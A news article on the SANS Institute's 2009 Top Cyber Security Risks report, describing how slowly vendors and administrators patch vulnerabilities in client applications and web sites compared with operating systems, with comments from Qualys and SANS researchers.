Report: Application Vendors Take Too Long to Fix Dangerous Security Holes

Researchers have found that vendors take at least twice as long to fix vulnerabilities in popular client-side programs and Web sites than they do the holes in supporting operating systems, even though the flaws in applications like QuickTime, Flash and Microsoft Office are the most vulnerable and exploited.

"When an operating system vulnerability comes out for Windows, it gets patched fairly quickly. But when a vulnerability comes out for Adobe Reader, for example, or for QuickTime or even for Microsoft Office, people apply these patches in a much slower rhythm," said Wolfgang Kandek, chief technical officer for Qualys, a provider of security risk and compliance technology.

The information he speaks of came from the Top Cyber Security Risks report released this month from the SANS Institute, an organization that provides security training and research. Researchers from Qualys and TippingPoint, another provider of network security solutions, worked with SANS researchers to compile the report's data.

The research data spans March 2009 to August 2009 attack information from 6,000 organizations that TippingPoint monitors with intrusion prevention systems, and vulnerability data from 9 million systems compiled by Qualys, as well as additional information from SANS personnel. SANS plans to release a cyber-security risks report every six months to keep the data up to date.

Data reveals that application vulnerabilities exceed operating system vulnerabilities and that targets against Web applications made up more than 60 percent of the attacks observed on the Internet. These vulnerabilities were "being exploited widely to convert trusted Web sites into malicious Web sites serving content that contains client-side exploits." But client-side programs are also vulnerable.

"The two big places that's happening is on these trusted Web sites where people wrote the applications that support the Web site, but they left flaws in their programs that cause all of their visitors to the Web site to be infected," said Alan Paller, the director of research for SANS. "The other one is flaws in client software like Flash and Adobe Reader and Microsoft Office. Those have vulnerabilities that are not being patched."

The report didn't delve into why it takes so much longer to rectify these types of vulnerabilities, but Kandek said he believes that IT administrators are simply more focused on securing operating systems than they are on securing applications.

And as to why the applications have so many holes in the first place, he theorizes that programmers are pushed more to write code that performs than code that's secure.

"Software in the past was developed to provide you the functions that you require. That is the focus -- does it print well, does it format well, does it allow me to do this and this," Kandek said. "The security and development -- there wasn't really a focus."

The SANS Institute hopes that this report and its future editions will help inform and educate programmers in the vendor community to focus more on security when they write their programs.